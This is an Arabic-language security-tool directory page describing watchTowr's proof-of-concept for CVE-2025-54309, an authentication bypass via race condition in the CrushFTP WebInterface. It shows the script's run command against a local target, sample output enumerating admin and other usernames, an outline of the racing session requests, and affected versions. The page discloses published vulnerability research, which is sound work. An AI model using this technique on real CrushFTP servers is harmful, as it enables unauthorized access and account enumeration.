Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/watchtowrlabs/watchtowr-vs-crushftp-authentication-bypass-cve-2025-54309
تحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الويباختبار الاختراقالمصادقة
GitHubwatchtowrlabs/watchtowr-vs-crushftp-authentication-bypass-cve-2025-54309

watchTowr-vs-CrushFTP-Authentication-Bypass-CVE-2025-54309

استغلال إثبات المفهوم لـ CVE-2025-54309، يوضح تجاوز المصادقة عبر حالة سباق في CrushFTP WebInterface لتعداد المستخدمين.

عرض المستودع
2839منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-54309

إثبات مفهوم لتجاوز المصادقة في CrushFTP

انظر منشور مدونتنا للحصول على التفاصيل التقنية

الكشف أثناء العمل

python3 watchTowr-vs-CrushFTP-CVE-2025-54309.py http://127.0.0.1:8082
[*] Generated new c2f value: 6XDQ
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchTowr-vs-CrushFTP-CVE-2025-54309.py
        (*) CrushFTP Authentication Bypass Race Condition PoC
        
          - Sonny , watchTowr ([email protected])

        CVEs: [CVE-2025-54309]
        
[*] CRUSHFTP RACE CONDITION POC
[*] TARGET: http://127.0.0.1:8082
[*] ENDPOINT: CrushFTP WebInterface getUserList
[*] ATTACK: 5000 requests with new c2f every 50 requests
============================================================
Starting race with 5000 request pairs...
============================================================
[*] Generated new c2f value: qUwd
[*] NEW SESSION: c2f=qUwd
[*] EXFILTRATED 3 USERS: crushadmin, default, TempAccount
[*] VULNERABLE! RACE CONDITION POSSIBLE!

الوصف

هذا البرنامج النصي هو إثبات مفهوم لـ CVE-2025-54309 ضد واجهات CrushFTP. من خلال إنشاء مجموعة من طلبات السباق التي تشترك في نفس معرفات الجلسة، طلب واحد لتعيين خاصية اسم المستخدم إلى "crushadmin" وطلب واحد لتنفيذ أمر مصادق عليه كمسؤول (crushadmin)، يمكن في هذا الإثبات استخراج قائمة أسماء المستخدمين. تم وصف المزيد من التفاصيل في [منشور مدونتنا] (https://labs.watchtowr.com/).

الإصدارات المتأثرة

  • قبل 10.8.5
  • 11 قبل 11.3.4_23

مزيد من التفاصيل في بيان CrushFTP

تابع watchTowr Labs

للحصول على أحدث الأبحاث الأمنية تابع فريق watchTowr Labs

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
تنزيل الأداة